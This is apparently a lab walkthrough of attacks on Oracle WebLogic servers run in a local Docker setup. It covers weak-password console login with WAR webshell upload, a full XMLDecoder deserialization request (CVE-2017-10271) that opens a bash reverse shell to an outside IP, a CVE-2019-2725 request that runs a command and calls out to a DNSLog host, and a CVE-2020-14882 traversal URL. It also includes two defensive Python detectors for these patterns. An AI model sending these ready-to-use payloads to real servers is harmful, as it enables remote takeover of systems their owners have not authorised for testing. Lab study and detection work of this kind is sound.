Introduction
WebLogic is an application server produced by Oracle Corporation in the United States. To be precise, it is middleware based on the Java EE architecture. WebLogic is a Java application server for developing, integrating, deploying and managing large-scale distributed web applications, network applications and database applications. It brings the dynamic capabilities of Java and the security of the Java Enterprise standard to the development, integration, deployment and management of large-scale network applications.
WebLogic is one of Oracle's main products, obtained through its acquisition of BEA. It is one of the main Java (J2EE) application servers on the commercial market and the world's first successfully commercialized J2EE application server; it has been released up to version 12c (12.2.1.4). The product line also extends to WebLogic Portal, WebLogic Integration and other enterprise middleware (although Oracle now mainly replaces these enterprise packages other than WebLogic Server with Fusion Middleware), as well as the OEPE (Oracle Enterprise Pack for Eclipse) development tool.
RCE caused by weak password login
Pull the docker image, then start the environment:
docker-compose up -d
Log in on port 7001
Build the URL http://192.168.3.108:7001/console
Weak password login
If more than five wrong passwords are entered, the account is locked, so log in here with a known weak password.
Successfully logged in here.
Make a war package
Create a separate folder containing the Ice Scorpion 3 JSP webshell.
Open cmd and run jar -cvf aaa.war .
This packages the current directory into a war package.
Upload the war package
Click to deploy
I could not connect with Ice Scorpion here, so I re-uploaded a Godzilla one instead; the steps are the same.
Successfully connected.
CVE-2017-3506/10271 XMLDecoder deserialization vulnerability
Append the following URLs to the host; if the response echoes as shown in the figure below, the wls-wsat component is present.
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
Linux reverse shell
Refresh the page while capturing the request, then modify it. This is the original request. First change the GET request to a POST request; Burp has a right-click option that converts the request format.
After changing to a POST request, some construction is needed to achieve RCE. The Content-Type must be text/xml, otherwise XMLDecoder may not parse the body. The following is the constructed request.
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.3.108:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ADMINCONSOLESESSION=CsBPjQgJv12n5Gn6sHQhTXT74KQ0yrhXn0JC2XKlJqKY7bdsZqP4!-1250251804
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 640

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i >& /dev/tcp/192.168.3.126/8888 0>&1</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
The picture below shows the request after the construction above; then forward it.
This screen appears after the request is forwarded.
Successfully received the reverse shell.
CVE-2017-10271 and CVE-2017-3506 have the same vulnerability principle; the difference is that CVE-2017-10271 bypasses the CVE-2017-3506 patch.
CVE-2019-2725 wls-wsat deserialization remote code execution vulnerability
Vulnerability introduction:
This vulnerability is in effect another entry point for CVE-2017-10271. The CVE-2017-3506 patch filters the object tag; the CVE-2017-10271 patch filters the new and method tags, void can only be followed by index and array, and class can only be followed by the byte type; the CVE-2019-2725 patch filters the class tag and limits the byte length in the array tag.
Affected components:
bea_wls9_async_response.war, wls-wsat.war
Affected versions:
10.3.6.0, 12.1.3.0
Vulnerability verification:
Access /_async/AsyncResponseService. If it returns 200, the vulnerability exists; if it returns 404, it does not:
/_async/AsyncResponseService
/_async/AsyncResponseServiceJms
/_async/AsyncResponseServiceHttps
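The patch history above amounts to a checklist of XMLDecoder constructs that should never appear inside a WorkContext header. The following is an added request-inspection example, not code from the original post or from Oracle's patches; the attribute whitelist and array cap are assumptions that follow the description above, and both SOAP samples are constructed.

```python
import xml.etree.ElementTree as ET

# Element patterns the successive WebLogic patches block, as the patch history
# above describes them: 3506 -> <object>, 10271 -> <new>/<method> plus limits on
# <void> and class, 2725 -> class and array length. Thresholds are assumptions.
BLOCKED_TAGS = {"object", "new", "method"}
VOID_ALLOWED_ATTRS = {"index", "array"}
MAX_ARRAY_LENGTH = 1024   # assumed cap; the page does not give Oracle's number

def localname(tag):
    """Drop the {namespace} prefix ElementTree prepends to qualified tags."""
    return tag.rsplit("}", 1)[-1]

def find_xmldecoder_abuse(soap_text):
    """Inspect a SOAP envelope and list the XMLDecoder constructs found inside
    any <WorkContext> header. An empty list means nothing suspicious; XML that
    does not parse is reported as a finding rather than silently passed."""
    try:
        root = ET.fromstring(soap_text)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings = []
    for ctx in root.iter():
        if localname(ctx.tag) != "WorkContext":
            continue
        for elem in ctx.iter():
            name = localname(elem.tag)
            if name in BLOCKED_TAGS:
                findings.append(f"blocked tag <{name}>")
            if name == "void":
                extra = sorted(set(elem.attrib) - VOID_ALLOWED_ATTRS)
                if extra:
                    findings.append(f"<void> carries {extra}")
            cls = elem.attrib.get("class")
            if cls is not None and cls != "byte":
                findings.append(f"class={cls!r} on <{name}>")
            if name == "array" and int(elem.attrib.get("length", 0)) > MAX_ARRAY_LENGTH:
                findings.append(f"<array> length {elem.attrib['length']} over cap")
    return findings

# Constructed sample mirroring the request structure shown on this page, with a
# harmless argument list; it is not the page's payload.
SUSPICIOUS = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1">
<void index="0"><string>/bin/true</string></void></array><void method="start"/></void>
</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"""

# Constructed benign header: a WorkContext that carries only a string value.
BENIGN = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<string>trace-id-constructed</string></work:WorkContext></soapenv:Header>
<soapenv:Body/></soapenv:Envelope>"""
```

Running it against request bodies logged by a reverse proxy gives a quick triage signal independent of the command string an attacker chose.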
Verify with DNSLog
Refresh while capturing the request, then modify it. As before, convert the GET request into a POST request and then modify the structure.
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.3.108:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 859
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
          <void index="0">
            <string>/bin/bash</string>
          </void>
          <void index="1">
            <string>-c</string>
          </void>
          <void index="2">
            <string>ping `whoami`.tsqohg.dnslog.cn</string>
          </void>
        </array>
        <void method="start"/>
      </void>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body>
    <asy:onAsyncDelivery/>
  </soapenv:Body>
</soapenv:Envelope>
Send the request constructed above; a 202 response means the command executed successfully.
A DNS query was received here, which indicates the vulnerability is present.
CVE-2020-14882 Unauthorized access
Append the following URL to reach the console. If it can be accessed successfully, the unauthorized-access vulnerability exists.
http://192.168.3.108:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
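The URL above hides a directory traversal behind two layers of percent-encoding (%252E%252E%252F decodes to %2E%2E%2F and then to ../), so the raw path looks like a static image while the decoded path reaches console.portal. The following added log-review example, not from the original post, decodes each request path repeatedly and flags any request whose resolved path differs from what its raw path suggests; it also catches single-encoded and unencoded '..' segments. The access-log lines are constructed.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Constructed Common Log Format lines, not taken from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2023:10:00:00 +0000] "GET /console/images/logo.png HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2023:10:00:01 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true HTTP/1.1" 200 9031
10.0.0.7 - - [01/Jan/2023:10:00:02 +0000] "GET /console/images/%2E%2E%2Fconsole.portal HTTP/1.1" 302 0
10.0.0.9 - - [01/Jan/2023:10:00:03 +0000] "GET /console/images/%20spacer.png HTTP/1.1" 200 43
"""
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def fully_decode(path, max_rounds=4):
    """Percent-decode until the string stops changing; returns (decoded, rounds).
    max_rounds bounds pathological inputs that keep decoding to something new."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def detect_encoded_traversal(target):
    """Return None for an ordinary request, otherwise a dict with the raw path,
    the number of decoding rounds that were needed to expose '..', and the path
    the request actually resolves to. Unencoded '..' is reported with rounds=0."""
    raw = urlsplit(target).path
    decoded, rounds = fully_decode(raw)
    if ".." not in decoded.split("/"):
        return None
    return {"raw": raw, "rounds": rounds, "resolved": posixpath.normpath(decoded)}

def scan_log(text):
    """Apply the check to every request line; findings are returned in log order."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            finding = detect_encoded_traversal(match.group(1))
            if finding:
                findings.append(finding)
    return findings
```

A request that starts under /console/images/ but resolves to /console/console.portal is the signature to alert on, whatever the query string carries.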
Tool usage
xray
When scanning with xray, scan the root directory directly; if you scan the vulnerable page itself, the vulnerability will not be found. Even so, this target has many vulnerabilities and the scan is still not comprehensive. The scanned page is shown below.
scan results
liqunkit
This tool behaves the same as xray: accessing the vulnerability link directly finds nothing, and the root directory must be scanned instead.
Above is the scan of the vulnerable page, with no results.
Below is the scan of the root directory, with three results.
weblogicexploit
This tool only supports direct exploitation.
Connection succeeded.